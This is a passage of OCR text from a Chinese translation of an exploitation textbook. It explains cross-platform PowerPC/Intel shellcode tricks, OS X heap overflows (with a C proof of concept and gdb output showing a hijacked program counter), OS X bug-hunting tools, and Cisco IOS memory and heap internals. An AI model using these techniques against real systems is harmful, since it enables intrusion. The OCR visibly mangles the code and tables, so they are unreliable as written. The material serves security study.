在 PowerPC 和 JIntel 上 都 是 nop， 因 为 在 PowerPC 上 它 实际 上 变 成 了 fpnmsub (floating-negative- 
multiply-subtract) 指令 ， 就 是 什么 也 不 做 ;在 Intel] 平 台 上 它 又 变 成 了 4 条 cld (clear direction flag) 
HD 〈0xfe)。 然 后 ， 他 们 需要 找到 一 条 这 样 的 指令 ， 它 在 PowerPC 上 什么 也 不 做 ， 但 在 Intel 上 执 
行 jmp 动 作 。 他 们 发 现 
0x5£90eb48 
正 适合 ， 因 为 在 PowerPC 上 它 被 解释 成 rlwnm (rotate left word then and with mask), ifj fEIntel kt 
又 变 成 了 
l Ox5f: pop edi 


0x90: nop 
Oxeb48 : jmp 0x48 


这 人 允许 他 们 把 Intel 和 PowerPC shellecode 放 到 不 同 的 地 方 。 

另 一 种 可 能 是 使 用 PowerPC 的 nop 指 令 ， 其 低 序 的 2B 在 Intel 上 为 “jmp”， 例 如 前 面 显示 的 
0xeb48。 这 条 指令 为 : 

0x6060eb48 

然后 ， 你 就 可 以 把 保存 的 返回 地 址 /函数 指令 改写 成 指向 这 条 指令 的 第 二 个 字 节 。 因 为 
PowerPC 上 地 址 会 入 的 原因 ， 这 条 指令 将 被 当 作 nop 来 执行 。 然 而 ， 在 Intel 上 我 们 将 跳 到 正确 的 
位 置 ， 它 将 被 当 作 jmp 来 执行 。 

根据 实际 的 情况 ， 有 时 候 可 能 根本 就 不 需要 这 样 的 技巧 ， 因 为 解决 办 法 其 实 可 以 很 简单 。 在 
栈 溢 出 的 情形 里 ， 我 们 可 以 利用 Intel 和 PowerPC 在 栈 布局 方面 的 差异 ， 这 在 某 种 程度 上 将 允许 有 
两 个 不 同 的 shellcode 块 。 但 对 跨 平 台 的 利用 程序 来 说 ， 也 可 能 非常 困难 ， 这 通常 发 生 在 堆 溢出 或 
格式 化 串 bug 的 情形 里 ， 在 这 种 情形 里 要 想 找 到 同时 适用 两 个 平台 的 可 改写 的 可 靠 指针 是 需要 一 
定 技巧 的 。 因 此 ， 虽 然 跨 平 台 的 shellcode 问 题 可 能 比较 有 意思 ， 但 解决 办 法 可 能 很 简单 ， 也 可 能 
非常 难 ， 但 不 管 怎么 说 ,围绕 这 个 问题 你 通常 会 找到 一 个 解决 方法 ， 从 而 写 出 两 个 单独 的 
shellcode。 也 就 是 说 ， 如 果 你 在 可 以 应 用 这 个 技术 的 地 方 偶遇 bug， 那 么 用 Neil 和 Ilja 的 方法 来 解 
决 这 个 问题 的 确 很 漂亮 。 


12.7 OS X 堆 利 用 


OS Xx 的 堆 实 现 和 其 他 平台 的 堆 实 现 不 太一 样 。 它 把 用 户 数 据 和 堆 管 理 数 据 混在 一 起 ， 这 很 
军 匈 。 在 zone 里 分 配 块 ， 结 构 、malLloc_zone_t、“malloc,” 和 “free,” 的 管理 函数 指针 以 及 
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相关 的 函数 都 在 各 自 的 zone 里 。nemoG@felinemenace.org 在 Phrack 上 发 表 的 文章 (Phrack 63, Article 
0x05， 详 见 12.10 节 列 出 的 文献 ) 大 致 介绍 了 在 OS 了 上 改写 malloc_zone_t 结 构 的 堆 利 用 技术 。 
这 个 技术 是 利用 堆 溢出 的 最 简单 的 方法 , 在 被 溢出 的 块 可 以 溢出 到 函数 指针 表 的 情形 里 ， 它 可 以 
大 显 身 手 。 在 最 简单 的 情形 里 ， 当 下 面 的 条 件 满 足 时 ， 就 可 以 使 用 这 个 利用 方法 。 

(1) 被 溢出 的 块 “ 很 小 ”( 小 于 5$00B) 或 “很 大 ”( 大 于 0x4000B)。 

(2) 攻击 者 可 以 改变 程序 ， 以 确保 已 经 分 配 了 足够 “大 ”的 块 ， 并 确保 在 溢出 的 缓冲 区 和 对 
应 的 malloc_zone 函 数 指针 表 之 间 没 有 不 可 写 的 页 。 

(3) 被 溢出 的 块 可 以 溢出 足够 远 ， 从 而 允许 改写 函数 指针 。 

这 个 技术 的 优点 在 于 ， 只 需 稍 做 修改 ， 就 可 以 把 堆 溢 出 变 成 经 典 的 栈 溢出 。 

nemo 的 文章 里 提供 了 这 个 技术 的 实例 , 解释 了 怎么 通过 它 利 用 WebKit 库 文件 (OS 义 中 Safari 
Web 浏 览 器 和 电子 邮件 客户 端的 一 部 分 ) 里 的 bug。 

下 面 这 个 程序 简单 地 演示 了 nemo 的 技术 : 

#include <stdio.h> 


#include <stdlib.h> 
#include <string.h> 


extern unsigned *malloc_zones; 
int main( int argc, char *argv[] ) 
{ 

char *pl = NULL; 


char *p2 = NULL; 


printf("malloc zones: %08x\n", *malloc zones ); 
printf("pl: %08x\n", pl ); 


pl = malloc( 0x10 ); 


while( p2 < *malloc_zones ) 
p2 = malloc( 0x5000 ); 


printf("p2: %08x\n", p2 ); 


unsigned *pu - pl; 


while( pu < (*malloc, zones + 0x20) ) 
*put+ = 0x41414141; 12 
free( pl ); 
free( p2 ); 
return 0; 


) 
可 见 ， 我 们 先 简单 地 分 配 了 一 个 很 小 的 块 ， 然 后 〈 连 续 ) 分 配 大 小 为 0x5000 的 块 ， 直 到 分 
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配 的 块 地 址 大 于 malloc_zones 指 针 。 这 表明 ， 我 们 与 我 们 的 目标 malloc_zone ttiz RART 
写 的 页 ， 因 此 ， 对 于 如 何 攻 击 这 个 堆 来 说 ， 整 个 线路 是 很 清晰 的 。 我 们 在 堆 上 写 0x41414141， 
从 pl 一 直 向 上 写 到 *malloc_zones + 0x20。 当 接 下 来 调用 free() 的 时 候 ， 在 0x41414141 (或 
者 由 于 PowerPC 地 址 取 整 关系 ， 变 成 了 0x41414140) 处 结束 执行 。 在 sab 中 看 起 来 像 下 面 这 样 


(gdb) run 
Starting program: /Users/shellcoders/chapter_12/heap 
Reading symbols for shared libraries . done 
malloc_zones: 01800000 
pl: 00000000 
p2: 02008000 


Program received signal EXC BAD ACCESS, Could not access memory. 
Reason: KERN, INVALID ADDRESS at address: 0x41414140 
0x41414140 in ?? () 


从 攻击 者 的 角度 来 看 ，OS X 的 另 一 个 好 处 是 ， 它 在 相对 稳定 的 地 址 里 提供 一 些 可 写 的 函数 
指针 ， 而 这 些 地 址 明显 成 为 “可 在 任何 地 址 写 任 何 值 ” 原 语 的 目标 ， 例 如， 在 针对 应 用 程序 溢出 
媒介 或 格式 化 串 bug 中 可 能 会 发 现 的 函数 指针 。 


12.8 在 OS X 中 寻找 bug 


有 一 些 非常 有 用 (只 用 于 OS X) 的 工具 ， 必 须 纳 入 bug 猜 人 的 军火 库 。 

O ktrace/kdump。 在 前 面 已 经 提 过 ， 这 两 个 极 棒 的 工具 人 允许 查看 给 定 的 进程 正在 调用 什么 
系统 调用 。 它 一 般 情况 下 都 很 有 用 ， 在 写 大 量 调用 syscall 的 shellcode 的 时 候 尤 为 有 用 。 

口 vmmap。 为 指定 的 进程 生成 一 个 内 存 映射 ‘map)、 详 细 的 页 权限 、 加 载 的 库 等 。 你 也 可 
以 用 它 查 看 在 不 同时 间 获 得 的 两 个 快照 间 的 “不 同 之 处 ”。 
heap，leaks，malloc_history。 如 果 你 正在 寻找 堆 溢 出 ， 那 么 它们 可 能 都 能 派 上 用 场 ， 
因为 它们 可 以 分 别 检查 堆 分 配 的 情况 、 可 疑 的 内 存 泄露 以 及 所 有 进程 的 分 配 历 史记 录 。 
a lsof。 显 示 打开 的 文件 (包括 IP 套 接 字 )。 | 
口 nm。 显 示 二 进 制 文件 里 的 名 称 〈 更 确切 地 说 是 符号 表 )。 

口 otool。 显 示 二 进 制 文件 中 被 删除 的 部 分 ， 例 如 ， 反 汇编 区 段 、 符 号 、 使 用 的 列表 库 等 。 
Qa xcode。 标 准 的 OS X 开 发 工具 ， 包 括 了 gcc 和 gdb。 


12.9 一些 有 趣 的 bug 

阅读 他 人 编写 的 利用 程序 是 很 好 的 学 习 方法 ， 因 为 他 们 演示 的 有 趣 技术 对 你 寻找 bug 有 了 时 可 
能 会 有 所 帮助 。 

我 向 你 推荐 Month of Apple Bugs 项 目 。 尽 管 这 个 项 目的 赞成 与 反对 者 从 道义 上 各 抒 已 见 ， 但 
他 们 从 技术 角度 都 对 此 持 肯 定 意见 ， 它 的 确 是 一 份 有 趣 且 有 益 的 读物 : http:/projects.info-pull. 
com/moab/. 

除 此 之 外 ， 还 有 大 量 已 经 公开 的 bug， 其 中 一 些 还 附 有 利用 程序 ， 它 们 除了 有 助 于 说 明 技术 








L 
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外 ， 还 表明 了 Apple 安 全 社区 正 关注 的 方向 。 

例如 ，Matasano 的 Dino Dai Zovi 发 现 ，Mach 和 Unix 安 全 模型 之 间 的 差异 将 产生 一 个 缺陷 。 
如 果 父 进程 强制 setuid 子 进程 产生 异常 ， 那 么 将 有 可 能 强制 子 进程 执行 父 进程 通过 Mach“ 异 常 端 
口 ” 提 供 的 代码 , 详 见 http://www.matasano.com/log/530/matasano-advisory-macos-x-mach-exception- 


server-privilege-escalation/。 

在 Apple QuickTime 和 iTunes 里 发 现 的 一 些 文件 格式 解析 问题 ， 将 影响 包括 OS X 在 内 的 所 有 
平台 。 最 近 ， 几 乎 所 有 的 主流 操作 系统 都 受到 了 默认 图 像 文件 解析 问题 的 影响 ， 这 已 没有 什么 新 
意 了 ， 只 有 了 解 在 这 些 问 题 中 ， 有 多 少 是 被 定制 的 文件 格式 模糊 测试 发 现 的 ， 有 多 少 是 被 其 他 技 

Kevin Finisterre 举 例 说 明 在 Intel 上 绕 过 OS X 不 可 执行 栈 的 技术 时 ， 介 绍 了 launchd 守 护 程序 
里 一 个 有 趣 的 格式 化 串 bug (“Non eXecutable Stack Lovin on OSX86”, http:// www.digitalmunition. 
com/NonExecutableLovin.txt ) 。 也 可 参见 http:/www.digitalmunition.com/DMA%5B2006-0628a% 
SD.txt 和 http://osvdb.org/displayvuln.php?osvdb id=26933。 

Kevin 使 用 的 技术 是 改写 close () 的 动态 加 载 器 stub?, 并 把 它 指 向 (可 执行 ) 堆 上 的 shellcode。 

最 近 ，Ia van Sprundel 在 OS X 的 ping 和 traceroute 程 序 里 发 现 了 一 个 漏洞 ， 允 许 本 地 用 户 
获取 root 访 问 权 限 : http://www.suresec.org/advisories/adv5.pdf 

这 个 漏洞 是 一 个 经 典 的 sprintf 溢 出 ， 如 下 所 示 : 


static char buf[80]; 


..etc... 
(void)sprintf(buf, "%s", inet ntoa(*(struct in_addr *)&1)); 


Apple bug 的 CVE 条 目 也 值得 一 看 : http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=apple. 


12.10 关于 OS X 破解 的 必 读 资料 


对 于 那些 想 认 真 钻研 OS X 安 全 、 破 解 程序 和 防护 机 制 的 人 来 说 , 最 好 把 下 面 所 列 的 文章 (其 
中 大 部 分 在 本 章 前 面 都 提 到 过 〉 都 读 一 遍 。 

Neil Archibald 和 Ia van Sprundel, “Breaking Mac OS X", Ruxcon, 2005, http://felinemenace. 
org/papers/breaking mac osx.ppt. 

B-r00t, "PowerPC/OS X (Darwin) Shellcode Assembly/Smashing The Mac For Fun & Profit", 
http;//packetstormsecurity.org/shellcode/PPC OSX Shellcode Assembly.pdf. 

Kevin Finisterre,. “Non eXecutable Stack Lovin on OSX86", http://www.digitalmunition.com/ 


NonExecutableLovin.txt. 
IBM PowerPC Assembler Language Reference, http://publib16.boulder.ibm.com/pseries/en US/ 


aixassem/alangref/mastertoc.htm. 





QD stub 一 般 是 指 一 小 段 程序 。 一 一 译 者 注 
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Christian Klein 和 JIlja van Sprundel, “Mac OS X kernel insecurity”, http://www.blackhat.com/ 
presentations/bh-europe-05/BH EU 05-Klein Sprundel.pdf. 

The Last Stage of Delirium Research Group, “UNIX Assembly Codes Develop-ment for 
Vulnerabilities Illustration Purposes", http://Isd-pl.net/projects/asmcodes.zip. 

H.D. Moore, “Mac OS X PPC Shellcode Tricks", http://www.uninformed.org/?v—-1&a-1 . 

nemo@felinemenace.org, “Abusing Mach on Mac OS X", http://uninformed.org/?v=4&a= 
3&t-sumry. 

nemo@felinemenace.org, ^ OS X Heap Exploitation Techniques”, http://felinemenace.org/ 
papers/p63-0x05 OSX Heap Exploitation Techngiues.txt. 

palante, “PPC Shellcode", http://community.corest. com/-juliano/palante-ppc-sc. txt. 

Christopher Shepherd, “ PowerPC Stack Attacks, Part 1.” http://felinemenace.org/~nemo/ 
docs/ppcasm/ppc-stack-1-html. 

Christopher Shepherd, “ PowerPC Stack Attacks, Part 2." http://felinemenace.org/~nemo/ 
docs/ppcasm/ppc-stack-2.html . 


12.11 a 


本 章 介 绍 了 在 开始 寻找 、 利 用 运行 在 OS 义 平台 上 的 软件 甚至 OS 义 本 身 的 bug 之 前 需要 掌握 的 
知识 。 我们 从 bug 猫 人 和 利用 程序 作者 的 角度 介绍 了 几 个 突出 的 OS X 特 性 ， 并 演示 了 怎样 规避 OS 
X 最 新 版 本 〈Intel 平 台 ) 中 不 可 执行 栈 的 方法 。 

Mac 的 设计 显然 不 错 ， 人 们 乐于 使 用 ， 它 本 身 也 易于 配置 ， 因 此 ，Mac 的 市 场 占 有 率 可 能 会 
有 所 增加 。 如 果真 是 这 样 安全 团体 应 当 像 对 待 它 的 竞争 者 那样 对 它 进行 仔细 审查 。 广 告 也 从 旁 
提供 了 佐证 ，OS X 在 未 来 几 年 中 的 发 展 趋势 值得 关注 。 






思科 IOS 破 解 








科 公司 主要 为 互联 网 及 公司 网 络 提供 路 由 和 交换 设备 。 路 由 和 交换 设备 目前 还 处 于 发 

/LA 展 过 程 中 ， 且 变 得 日 益 复 杂 ， 它 们 除了 简单 的 包 交换 外 ， 还 提供 许多 附加 的 服务 。 这 
可 不 是 个 好 消息 ， 因 为 增加 了 功能 就 要 增加 相应 的 代码 ， 而 代码 可 能 会 被 破坏 和 利用 。 

在 以 前 ， 只 有 少数 安全 研究 者 关注 这 个 被 广泛 使 用 的 平台 ， 研 究 怎样 攻击 它 ， 因 为 一 般 人 无 
法 接触 昂贵 的 思科 设备 。 另 外 的 原因 可 能 是 通用 操作 系统 平台 更 容易 掌控 ， 要 达成 同样 的 结果 ， 
不 需要 那么 多 深奥 的 知识 。 

然而 ， 随 着 Windows 和 Linux 系 统 引 入 了 高 级 保护 机 制 ， 更 多 的 研究 者 可 能 会 改变 方向 ， 研 
究 起 互联 网 所 运行 的 只 有 较 弱 保护 的 平台 。 


13.1 思科 IOS 纵览 


思科 公司 的 产品 线 很 长 。 在 公司 创立 初期 ， 大 部 分 的 产品 都 运行 IOS (Cisco Internetworking 
Operating System)。 思 科 公 司 现在 的 产品 线 里 ， 只 有 路 由 和 交换 设备 还 在 运行 IO0S。 暂 时 抛 开 这 
样 的 发 展 趋势 不 谈 ， 单 看 非常 巨大 的 安装 基数 ， 以 及 路 由 器 和 交换 机 几乎 从 不 更 新 IOS 版 本 的 事 
实 ， 攻 击 运行 IOS 的 系统 仍然 非常 有 趣 。 对 用 户 来 说 ， 既 然 这 些 路 由 器 很 少 被 破解 ， 那 为 什么 还 
要 更 新 它们 呢 ? 

因为 思科 IOS 是 在 公司 成 立 初期 开发 的 ， 所 以 它 在 只 有 较 低 处 理 能 力 及 较 小 内 存 的 路 由 器 上 
运行 。 它 的 主要 任务 是 初始 化 并 管理 硬件 ， 以 及 尽 可 能 快 地 转发 包 。 因 此 ， 思 科 IOS 与 最 新 的 多 
用 户 、 多 任务 操作 系统 比 起 来 ， 明 显 是 小 巫 见 大 巫 。 


13.1.1 硬件 平台 

思科 路 由 和 交换 设备 的 大 小 不 一 ， 从 较 小 的 桌面 设备 到 巨大 的 占 满 整个 19 英 寸 机 架 的 12000 
系列 ， 应 有 尽 有 。 各 硬件 架构 之 间 也 有 很 大 的 差别 。 不 过 ， 较 小 的 路 由 器 硬件 与 PC 这 样 的 通用 
目的 设备 的 硬件 差不多 ， 而 从 在 各 接口 间 交 换 包 的 较 大 型 设备 ， 一 直到 传说 中 的 12000 系 列 的 路 
由 交换 结构 ， 则 更 倾向 于 使 用 专用 硬件 。 这 样 一 来 ， 主 处 理 器 的 性 能 就 不 必 随 着 路 由 器 文 持 带宽 
的 增加 而 增加 了 。 

IOS 操 作 系 统 运行 在 主 CPU 上 。 思 科 设 备 采 用 的 CPU 架 构 并 不 是 一 成 不 变 的 。 比 如 说 ， 在 早 
期 访问 层 路 由 器 (例如 2500 系 列 ) 里 ， 其 主 CPU 是 Motorola 68000。7200 系 列 企业 级 、WAN 路 由 
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器 以 及 近来 的 线 卡 〈line cards) 使 用 了 64 位 MIPS CPU。 现 在 的 思科 设备 使 用 最 多 的 是 32 位 的 
PowerPC CPU， 例 如 ， 广 泛 部 署 的 1700 和 2600 系 列 路 由 器 使 用 的 CPU 就 是 它 ， 截 止 到 2003 年 4 月 
RHE AIL, BARU SHI DE. 

攻击 思科 路 由 器 时 ， 需 要 了 解 正 在 攻击 的 是 运行 在 主 CPU 上 的 软件 ,还 是 下 放 到 专用 硬件 或 
扩展 板 卡 上 的 软件 。 被 特殊 的 数据 包 触发 的 漏洞 可 能 正好 导致 专用 的 加 速 硬 件 而 不 是 预想 中 的 主 
BE ZU. 


13.1.2 RHA 


IOS 采 用 了 单片机 系统 映像 的 形式 。 后 来 思科 又 发 布 了 组 件 形式 的 IOS， 并 开始 在 实际 环境 
中 部 署 ， 但 就 目前 而 言 ， 使 用 最 多 的 还 是 单片机 映像 格式 。 到 2007 年 4 月 ， 思 科 在 其 FTP 服 务 器 
上 总 共 提 供 了 18 257 个 不 同 的 IOS 版 本 。 当 我 们 从 事 破 解 研究 时 ， 一 定 要 记 住 这 个 事实 ， 因 为 每 
个 版 本 都 有 不 同 的 内 存 地 址 、 函 数 及 代码 生成 。 从 来 都 不 会 出 现 像 Windows 2000 和 XP 上 存在 的 
单个 通用 返回 地 址 。 

菜 些 IOS 版 本 的 使 用 范围 比 其 他 的 更 广泛 一 些 。IOS 版 本 由 带 有 不 同 特征 的 发 布 序列 及 目标 
客户 群 组 成 。IOS 版 本 号 后 面 的 字母 指示 了 发 布 序列 。 其 中 一 些 重要 的 发 布 序列 如 下 。 

OQ mainline 序 列 没 有 专门 的 字母 ， 默 认 是 可 以 销售 的 。 这 是 最 稳定 的 IOS 版 本 ， 也 是 使 用 最 

多 的 版 本 。 

口 Technology 序 列 包 含 了 不 太 成 熟 的 还 不 适宜 放 在 mainline 中 的 特征 ， 用 T 表 示 。 

a Service Provider 序 列 针对 ISP 做 了 相应 的 调整 ， 用 S 表 示 。 

口 Enterprise 序 列 和 Service Provider 序 列 正好 相反 ,主要 用 于 企业 级 的 核心 路 由 器 , HERT. 

除了 版 本 和 序列 外 ,映像 运行 的 平台 能 提供 什么 功能 对 研究 者 来 说 也 很 重要 。 但 不 同 的 功能 
组 合 非常 多 。 从 思科 下 载 的 映像 ， 其 文件 名 包括 了 所 属 平台 、 特 征 代码 、IOS 版 本 的 主 版 本 号 、 
次 版 本 号 、 发 布 号 以 及 序列 标识 符 。 例 如 ，c7200-is-mz-124-8a.bin 表 示 IOS 版 本 为 12.4， 发 布 号 是 
8a, 用 于 Cisco 7200, 仅 支持 中 路 由 功能 (is 通常 意味 着 了 -Plus 特征 集 , 但 对 7200 来 说 有 一 个 例外 )， 
被 压缩 过 ,从 RAM 中 执行 。 表 13-1 列 举 了 IOS 映 像 文件 名 里 第 一 个 字母 及 其 含义 ( 表 13-1 和 表 13-2 
的 内 容 都 是 从 http://www.cisco.com/warp/public/765/tools/quickreference/ciscoiospackaging-eng.pdf 
复制 的 )。 表 13-2 列 举 了 映像 文件 名 中 的 中 间 字 母 及 其 含义 。 


表 13-1 思科 ISO 映像 文件 名 中 的 第 一 个 字母 






APPN 





a2 ATM GPRS 网 关 支 持 结 点 〈7200) 
a3 SNASW 下 路 由 

b AppleTalk Hi IP HH. FEISDN (mc3810) 
c RAS Base IP (8500CSR) 

d 桌面 路 由 企业 用 Ckitchen sink 路 由 》 
dsc 拨号 架 控 制 器 IPX 路 由 《〈 低 端 路 由 器 》 


g5 企业 用 无 线 〈7200) 服务 提供 商 〈 或 UBR 所 用 的 DOCSIS) 
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CHE) 










IP/ATM Base Image (8500MSR,LS1010) 
yly5 卫 路 由 《〈 低 端 路 由 器 ) 
IP/ADSL 


IBM 





telco Telco 





Distributed Director 


56i 加 密 法 (DES) 56i 加 密 法 (DES) 
ent Plus CH 5telco —i£ fi Fd) s4 无 转换 的 Basic 
kl BPI s5 无 HD 模拟 /AIM/Voice 的 Basic 
k2/k8/k9 Encryption (DES-k8, 3DES-k9) t Telco 返 回 
o 防火 墙 v VIP 支持 
03 防火 墙 /IDS v3,v8 Voice (17xx) - v3-VOICE, v8=VOX 
s Plus 或 Cat6K/7600 上 的 LAN Only w6 无 线 
s2 Voice IP ZIP Voice Gateway (只 有 上 x( 或 xz2) MCM 
26xx/36xx/37xx) 
s3 Basic( 有 限 的 四 路 由 ,用 于 有 限 内 存 26xx、 
36xx 





由 上 面 的 讨论 可 知 ，IOS 映 像 之 间 的 区 别 非常 大 ， 比 如 版 本 、 平 台 以 及 安装 的 特性 等 。 这 些 
因素 使 得 破解 IOS 变 得 非常 困难 ， 因 为 与 Windows 或 UNIX 环 境 里 单一 的 二 进 制 发 行 版 相 比 较 而 
言 ， 很 难 在 不 同 版 本 的 IOS 中 找到 共同 的 属性 。 

在 将 来 , 这 种 情形 会 随 着 IOS XR (Cisco 路 由 器 的 下 一 代 操 作 系统 ) 的 广泛 部 署 而 有 所 改变 。 
XR 利用 了 QNX， 因 此 具有 与 现在 使 用 的 系统 完全 不 同 的 属性 。 但 就 目前 而 言 ,传统 的 IOS 映 像 仍 
将 流行 很 长 一 段 时 间 。 

13.1.3 IOS 系统 架构 


思科 IOS 的 架构 非常 简单 ， 操 作 系 统 由 内 核 、 设 备 驱 动 程序 代码 以 及 进程 组 成 。 用 于 快速 交 
换 的 专用 软件 是 设备 驱动 程序 的 一 部 分 。 

如 果 你 在 研究 怎样 破解 IOS， 那 么 可 以 把 整个 系统 想象 成 由 单一 的 MS-DOS EXE 程 序 组 成 的 
操作 系统 。IOS 使 用 run-to-end 调 度 程序 。 与 大 多 数 其 他 的 操作 系统 相 比 ，IOS 在 进程 执行 过 程 中 
不 做 抢先 式 处 理 ， 而 是 一 直 等 到 进程 完成 任务 自动 返回 内 核 后 才 处 理 。 

1. 内 存 布 局 

IOS 没 有 使 用 任何 内 部 保护 机 制 。 进 程 对 内 存 段 没有 做 任何 防护 ， 可 以 从 其 他 进程 中 直接 访 
问 这 些 内 存 段 ，IOS 大 量 使 用 共享 内 存 、 全 局 变量 以 及 可 从 任何 进程 访问 的 标记 。 

IOS 将 内 存 分 成 所 谓 的 区 域 (region)， 如 表 13-3 所 示 。 
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513-3 ”思科 IOS 内 存 区 域 












可 执行 的 IOS 代 码 Flash 保存 映 象 〈 可 能 从 这 里 运行 ) 和 启动 配置 
IData 已 初始 化 的 变量 PCI PCI 总 线 上 的 PCI 内 存 变量 
Local 运行 时 数据 结构 和 局 部 堆 IOMEM 主 CPU 和 网 络 接口 控制 器 共享 的 内 存 变 量 


未 初始 化 的 数据 


所 有 的 进程 共享 访问 这 些 内 存 区 域 , 这 使 得 无 法 跨 进程 写 保 护 , 但 与 其 他 操作 系统 里 分 开 处 
理 的 惯例 相 比 ， 它 的 花 销 明显 少 得 多 。 

2. IOSHE 

每 一 个 进程 都 有 一 个 属于 它 自己 的 栈 , 那 其 实 就 是 已 分 配 的 堆 块 。 保存 初始 化 和 未 初始 化 变 
量 的 存储 空间 在 编译 时 就 已 经 知道 了 , 从 而 在 各 自 的 区 域 里 保留 了 。 堆 被 所 有 的 进程 共享 。 在 IOS 
里 ， 当 进程 分 配 堆 内 存 时 ， 这 个 内 存 块 其 实 是 从 全 局 堆 里 切 出 来 的 。 因 此 ， 各 自 进 程 的 ( 堆 ) 内 
存 块 彼此 相 邻 。 我 们 在 路 由 器 上 检查 内 存 分 配 的 情况 时 ， 就 可 以 看 到 这 样 的 信息 。 下 面 是 show 
memory 命 令 输 出 的 部 分 内 容 : 


Address Bytes Prev Next Alloc PC what 

81FBC680 0000222312 00000000 81FF2B10 8082B394 (coalesced) 
81FF2B10 0000020004 81FBC680 81FF795C 8001BC58 Managed Chunk Queue Elements 
81FF795C 0000001504 81FF2B10 81FF7F64 80FFEFF8 List Elements 
81FF7F64 0000005004 81FF795C 81FF9318 80FFF038 List Headers 
81FF9318 0000000048 81FF7F64 81FF9370 811360CC *Init* 

81FF9370 0000001504 81FF9318 81FF9978 81009408 messages 

81FF9978 0000001504 81FF9370 81FF9F80 81009434 Watched messages 
81FF9F80 0000005916 81FF9978 81FFB6C4 81009488 Watched Boolean 
81FFB6C4 0000000096 81FF9F80 81FFB74C 80907358 SCTP Main Process 
81FFB74C 0000004316 81FFB6C4 81FFC850 8080B88C TTY data 

81FFC850 0000002004 81FFB74C 81FFDO4C 8080EFF4 TTY Input Buf 


可 见 ， 截 然 不 同 的 任务 的 内 存 块 是 彼此 相 邻 的 。IOS 的 整个 堆 是 一 个 大 双向 链表 。 链 表 元 素 


的 头 部 定义 如 下 : 
struct HeapBlock { 

DWORD Magic; // OxAB1234CD 

DWORD PID; // Process ID of the owner 

DWORD AllocCheck; // Space for canaries 

DWORD AllocName; // Pointer to string with the name 
// of the allocating process 

DWORD AllocEC; // Instruction Pointer at the time the 
// process allocated this block 

void *NextBlock; // Pointer to the following block 

void *PrevBlock; // Pointer to the previous block's NextBlock 

DWORD BlockSize; // Size and usage information 

DWORD RefCnt; // Reference counter to this block 


DWORD LastFree; // PC when the last process freed this block 
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此 外 ,每 个 块 在 真正 的 载荷 之 后 都 以 一 个 所 谓 的 红色 区 结束 。 红 色 区 是 静态 的 “神奇 数字 交 
值 为 0xFD0110DF， 堆 完整 性 检查 进程 利用 它 检验 有 没有 溢出 发 生 。 

未 分 配 的 内 存 块 还 包含 了 用 于 把 它们 放 到 另 一 个 链表 (用 于 保存 空闲 块 ) 的 管理 信息 。 同 一 
个 块 同属 两 个 链表 ; 全 局 堆 和 空闲 块 链 表 。 如 果 Blocksize 字 段 中 最 有 意义 的 位 为 零 ， 那 么 这 个 
块 是 空闲 块 链表 的 一 部 分 ， 且 块头 部 后 面 是 FreeHeapBlock 结 构 : 


struct FreeHeapBlock { 
DWORD Magic; // OxDEADBEEF 
DWORD unknown1; 
DWORD unknown2; 
DWORD unknown3; 
void *NextFree; // Pointer to the following free block 
void *PrevFree; // Pointer to the previous free block 
ME 
很 明显 ， 这样 的 多 重 链表 堆 结构 很 容易 被 破坏 。 到 目前 为 止 , 堆 恶化 是 思科 路 由 器 里 最 常见 
WURA. 为 了 防止 IOS 因 堆 恶 化 而 被 严重 破坏 , 被 称 作 Check Heaps 的 进程 会 定期 遍历 堆 链表 ， 
检验 它们 的 完整 性 。 它 大 致 会 做 如 下 检查 : 
口 校 验 块头 部 包含 神奇 数字 值 ; 
口 如 果 块 正 被 使 用 ， 检 验 红色 区 是 否 包含 0xFD0110DF; 
O 校 验 PrevBlock 指 针 不 为 NULL; 
O 校 验 PrevBlock 指 针 的 NextBlock 指 针 指 向 本 块 ; 
O 如 果 NextBlock 指 针 不 为 NULL， 校 验 它 正确 指向 了 这 个 块 的 红色 区 字段 后 面 ; 
O 如 果 NextBlock 指 针 不 为 NULL， 校 验 它 指向 的 块 有 一 个 PrevBlock 指 针 回 指 本 块 ; 
O 如 果 NextBlock 指 令 为 NULL〔 链 的 最 后 一 块 )， 检 验 它 在 内 存 边 界 上 结束 。 
除了 常规 检查 外 ， 当 进程 分 配 或 释放 堆 块 时 ， 它 也 会 执行 这 些 检查 。 这 些 检查 不 是 为 了 映像 
的 安全 性 而 引入 的 ， 显然 是 为 了 维护 路 由 器 的 稳定 性 。 如 果 某 些 东西 被 恶化 了 ， 思 科 更 喜欢 完全 
重启 机 器 ， 所 以 路 由 器 可 以 在 几 分 钟 甚至 几 秒 钟 内 恢复 工作 ， 你 可 能 都 不 会 注意 到 它 重 户 过。 这 
些 检查 明显 使 破解 更 困难 了 。 
3.19 内 存 
IOS 在 使 用 堆 时 有 另外 的 特性 : 一 个 内 存 区 被 称 为 JO 内 存 。 这 个 区 域 在 所 谓 的 共享 内 存 路 由 
器 上 是 相当 重要 的 ， 之 所 以 命名 为 共享 内 存 服务 器 ， 主 要 是 因为 CPU 与 媒介 控制 器 及 系统 的 其 他 
部 分 共享 内 存 区 域 。 IO 内 存在 分 配 主 堆 之 前 就 被 从 可 用 的 物理 内 存 中 划 出 来 了 , 包含 用 于 路 由 器 
代码 正常 使 用 或 某 个 接口 私有 的 缓冲 区 池 。 这 些 缓冲 区 池 主 要 是 环 状 缓冲 区 ， 虽 然 它们 有 类 似 堆 
的 结构 图 ， 但 在 碰 到 内 存 恶 化 攻击 时 的 反应 却 截然 不 同 。 环 状 缓冲 区 结构 在 启动 时 就 分 配 了 。 因 
为 主要 是 根据 接口 类 型 和 MTU 来 确定 它们 大 小 的 ， 所 以 IOS 在 运行 时 通常 不 必 重 新 整理 缓冲 区 。 
因此 ， 改 写 IO 内 存 里 的 头 信息 一 般 没 多 大 用 处 ， 因 为 这 些 信息 几乎 不 会 再 使 用 了 ， 第 一 次 注意 到 
恶化 的 很 可 能 是 正在 执行 检验 任务 的 Check Heaps 进 程 。 
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13.2 BRIOS 里 的 漏洞 


路 由 器 的 操作 系统 与 连 到 网 络 上 的 通用 目的 操作 系统 相 比 , 存在 不 同 的 攻击 面 。 网 络 路 由 器 
在 两 种 情形 时 会 处 理 攻击 者 提供 的 数据 : 路 由 器 在 接口 间 转 发 数据 包 , 或 者 路 由 器 是 流量 的 最 终 
目的 地 ， 也 被 认为 是 提供 了 服务 。 

一 般 来 说 , 任何 厂商 的 路 由 器 都 尽量 不 去 处 理 转 发 的 数据 包 。 任何 一 个 对 包 数 据 中 单一 位 的 
